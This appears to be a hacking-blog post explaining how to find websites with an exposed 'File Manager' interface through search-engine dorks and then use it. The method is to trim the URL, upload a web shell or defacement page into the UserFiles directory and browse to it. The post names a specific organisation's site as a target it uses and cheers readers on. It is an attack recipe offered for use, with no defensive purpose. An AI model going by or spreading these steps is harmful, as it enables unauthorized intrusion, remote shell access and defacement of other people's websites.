Header Ads

Home remote hacking "File Manager" ~ remote shell and deface upload vulnerability

"File Manager" ~ remote shell and deface upload vulnerability

08:34
 
Dorks :
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
 
Exploit : 
 
http://www.site.com/filemanager/index.html
 
Lets Start !

open google or bing and type dork inurl:/filemanager/userfiles/ filetype:pdf or 
inurl:/filemanager/index.html 

now select any website from search results 
after clicking on website url will be 
 
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
 
Now Delete keywords after filemanager
for example : 
 
Before : http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
 
After : http://www.site.com/filemanager/
 
Now find upload option there and upload your shell or deface Page there
you file will upload in userfiles directory 
 
To View your upload shell or file goto 
 
http://www.site.com/UserFiles/Shell.php
 
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
 
http://www.site.com/UserFiles/directory/deface.html

I USE http://www.ibew234.org/filemanager/
 
AND ENJOY...........
Tags :

No comments:

Subscribe to: Post Comments ( Atom )
Powered by Blogger.